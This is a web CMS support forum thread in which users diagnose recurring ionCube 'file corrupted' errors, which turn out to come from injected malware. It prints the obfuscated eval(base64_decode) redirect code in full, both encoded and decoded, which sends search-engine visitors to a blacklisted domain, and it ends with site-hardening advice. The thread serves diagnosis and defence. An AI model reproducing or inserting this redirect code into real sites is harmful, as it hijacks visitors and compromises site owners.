Problems, need help? Have a tip or advice? Post it here.
13 posts Page 1 of 2
Keep getting:
http://www.ntoupin.net/
"The file /home/ntoupinc/public_html/ntoupin.net/acp/page.php is corrupted."
same thing for all my sites using couch. Copy/overwrite the entire couch w/ original files and it works for a day and then does this again. Nothing else changes on the site at all. Any ideas..?
Makes my site completely unusable..
It could be ionCube related. Here is a quote from their FAQ page(emphasis added):
Q. I get a corrupted file message. Why?
A. The file may really be corrupted, or there may be an old Loader installed that does not recognise the type of encoded file that you have. You can check whether the Loader is already installed by using a phpinfo script, and if a version 2 Loader is installed, e.g. 2.5, then that should be updated to the latest Loader. Corrupted files are rare, but can occur to some types of encoded files if they are uploaded using an FTP program in ASCII mode instead of binary, or if the TAR smart cr/lf conversion feature is enabled in WinZIP. If updating Loaders does not resolve the problem, try reinstalling the PHP script making sure to transfer in binary.
I'm not sure what ftp client you are currently using, but you should try http://filezilla-project.org/. It should automatically use the correct transfer type for each file type.
It is the first time such a problem is being reported.

It could be a problem with IonCube loader.
What is intriguing, though, is that the problem crops up after a day or two of uploading fresh files. This makes me think of a different possibility -

I suspect that your server has been somehow compromised and some rogue program is injecting code into existing PHP files. Doing so to an IonCube encoded file will only make it unusable and ergo the problem.

As to how a server could get compromised - one possible (and the most prevalent) reason is that your local machine is infected. When you use your FTP program from your local machine, some malicious program makes its way onto the server.

The next time this problem crops up, please let us know before trying to rectify it.
I'll want to take a look at the files on your server to confirm (or discard) my fear.

Thanks
As far as there just being a general problem with ioncubes I find it hard to believe that it would be fine when I upload fresh files and a day later they are corrupt causing a problem, especially when I have an identical account at the same webhost (on the same server as well) hosting another site that is also using couchcms and it has not had a problem.

As far as the compromise I had my webhost scan my entire directory and they found nothing. The corrupt just started happening 2 days ago and it was fine all before that (was not touched for over a week before the two days ago when it started happening --- no ftp connections at all)

I scanned my machine locally as well with malwarebytes, sophos, & panda and they found nothing.

I'll post the next time it's up, i'm guessing tomorrow as I just reloaded the files a couple hours ago.
Very confused...
I replaced the couchcms files with the latest stable version (was on the new release that included the gallery feature (1.2.5RC1)) and it has not happened since, nothing else changed other than that. Not sure if there is something within the new release version that did it or what but it seems to be working now on the old version (1.2)
Also, was looking at some of the showcase sites listed here, one has the same corrupt error I was having, not sure if they even know it, with that I don't think it is a localized thing with just me.

viewtopic.php?f=7&t=539


http://www.arsenicdesignlab.com/arsenic/
It is intriguing.
http://www.arsenicdesignlab.com/ in all probability is using a very old version of Couch so that makes version 1.2.5RC a little less suspect.

I'll really want to know what exactly is happening.
I have send the owner of http://www.arsenicdesignlab.com/ a mail and if he happens to reply and grant me access to the site, I'll get a chance to try and see first-hand the problem.

Will keep you informed.
Googling around for reports of similar problems, I came across only a few instances.

This one has been reported on IonCube's forum and is the closest to the problem we have in hand
http://forum.ioncube.com/viewtopic.php?t=3248
Hi,

I have websited hosted on a Windows machine running Apache and PHP 5.1.
The website is encoded using the ioncube pro encoder php 6.5.

From time to time the website is showing the "index.php is corrupted" message although
the file is not modified.

I copy all the website from a backup and the website is running ok...after a few days or even weeks the message reapears and the website doesn't work. No one is modifying the file, it has the same number of bytes as the backup and the same modify date.

What can it be?

Thanks.

Official reply from IonCube
I've never come across that scenario before, but if it takes a restore of the file to get the site working again, it suggests either that the file has been modified or that there is some other element to the system that is causing an issue. Files can be changed without the file times being changed, and the only way to test for file modification would be by comparing checksums of the file on the server and the master copy. If you find out more information please create a ticket so that we can track the information and securely request private details from you.

All in all, even the guys at IonCube cannot give a definite answer.
I'll wait for a concrete instance of the problem before filing a ticket with ionCube.
True true, alrighty sounds good. If it happens to mine again I'll let you know and give you access to the files before replacing them so you can check it out :).

Nothing like squashing bugs! :P
@ntoupin
Some news for you.
The owner of http://www.arsenicdesignlab.com responded and graciously allowed me access to the site.
As suspected, this is what I found -
Almost every PHP file on his site had this obfuscated code prepended to it
Code: Select all
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw
0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9T
RVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0
lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwi
YmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2
dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0
Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIi
kgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxl
dXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLC
J0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwm
bHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcm
VmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVy
LCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaX
N0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIo
IkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn
0KfQp9DQp9DQp9"));

Decoded, the bytes above become
Code: Select all
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
   $referer=$_SERVER['HTTP_REFERER'];
   $uag=$_SERVER['HTTP_USER_AGENT'];
   if ($uag) {
      if (!stristr($uag,"MSIE 7.0")){
         if (stristr($referer,"yahoo") or
         stristr($referer,"bing") or
         stristr($referer,"rambler") or
         stristr($referer,"gogo") or
         stristr($referer,"live.com")or
         stristr($referer,"aport") or
         stristr($referer,"nigma") or
         stristr($referer,"webalta") or
         stristr($referer,"begun.ru") or
         stristr($referer,"stumbleupon.com") or
         stristr($referer,"bit.ly") or
         stristr($referer,"tinyurl.com") or
         preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or
         preg_match ("/google\.(.*?)\/url\?sa/",$referer) or
         stristr($referer,"myspace.com") or
         stristr($referer,"facebook.com") or
         stristr($referer,"aol.com")) {
            if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
               header("Location: http://gigop.americanunfinished.com/");
               exit();
            }
         }
      }
   }
}

As can be seen, the injected code is a 'Conditional redirect malware' and is supposed to redirect users visiting the site through search-engines to http://gigop.americanunfinished.com/ (a black-listed site).

As it happens, Couch's files are Ioncube encoded and the addition of the code only serves to make Ioncube detect that the file has been tampered with and throw the 'File corrupted' error you reported.

In all probability, that is what is happening on your site too.

Although the condition really is unrelated to Couch (a quick Google search will reveal that Wordpress and Joomla are the ones most affected), it would be proper to discuss ways of preventing this from happening -
http://redleg-redleg.blogspot.in/2012/0 ... ee-pl.html discusses this very exploit in detail and has a few good tips worth emulating. A few quotes from the site
Most hacked sites I see are due to compromised passwords. Start by doing a scan of your PC and make sure there are no Trojans/viruses capturing your ids/passwords, use a couple of different security packages. Change ALL passwords especially FTP. Never store/save your passwords in your FTP client, use secure FTP if available. Install a good anti-virus program and do regular scans of your computer. You hosting service may be able to help you pin it down, if you notify when you see any changes they could check the access logs and maybe determine the account being used when the files are modified.

The second most common thing I see is problems with file/folder permissions. The hackers get access to a site and open the file permissions up on a folder/file so they can continue to get access even if you change passwords etc. You'll see different views on what permissions should be I go with Files set to 644 Folders set to 755. It is a good idea to regularly check file/folder permissions.

Make sure you are running the latest versions and security patches of all software, CMS, Plugins, themes etc.

Frequently I also see hackers leave a backdoor on a site. This is usually a php file hidden away somewhere with system files, /cgi-bin/ used to be a popular place. This will be a php file that is not part of your site and it will contain a bunch of obfuscated stuff. There is an excellent article with some tips on how to find a backdoor from 25 Years of Programming -- Website security: How to find backdoor PHP shell scripts on a server.

If you have not already done so suggest you start by scanning your PC for trojans etc. then change all passwords, make sure your FTP account is not compromised. Check all folder/file permissions and make sure they are locked down.

And as a word of caution, do NOT use Filezilla FTP client to transfer the files. It stores all passwords in plain text format, so if your PC gets compromised your passwords stored in it will get stolen as well.

Hope this helps.
13 posts Page 1 of 2